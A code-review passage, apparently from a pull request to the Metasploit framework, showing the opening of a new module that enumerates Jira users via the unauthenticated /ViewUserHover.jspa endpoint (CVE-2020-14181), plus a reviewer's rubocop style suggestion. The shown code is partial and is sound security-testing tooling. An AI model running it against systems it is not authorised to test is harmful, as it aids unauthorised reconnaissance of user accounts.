modules/auxiliary/scanner/http/jira_user_enum.rb

```diff
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jira Users Enumeration',
+        'Description' => %q{
+          This module exploits an information disclosure vulnerability that allows an
+          unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint.
+          This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
+          Discovered by Mikhail Klyuchnikov @__mn1__
+          This module was only tested on 8.4.1
+        },
+        'Author' =>
+        [
+          'Brian Halbach', # msf module author
+          'Mikhail Klyuchnikov' # initial discovery and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['URL', 'https://jira.atlassian.com/browse/JRASERVER-71560'],
+            ['CVE', '2020-14181'],
+          ],
+        'DisclosureDate' => '2020-08-16'
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Jira Path', '/']),
+      ]
+    )
+    deregister_options('PASS_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'STOP_ON_SUCCESS', 'BLANK_PASSWORDS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'PASSWORD')
+  end
+
+  def base_uri
+    @base_uri ||= normalize_uri("#{target_uri.path}/secure/ViewUserHover.jspa")
+  end
+
+  def do_user_enum(user)
+    print_status("Begin enumerating user at #{vhost}#{base_uri}")
+    print_status("checking user #{user}")
+    res = send_request_cgi!(
+      'uri' => "#{base_uri}",
```

Comment:
`rubocop` is complaining about this line and it breaks our checks.
```suggestion
      'uri' => base_uri.to_s,
```
I noticed your branch is based on an old version of master and that's why you probably only see these `rubocop` errors after pushing the code. You can rebase your branch on an up-to-date `master` to make sure the git hooks are running against the most recent rules.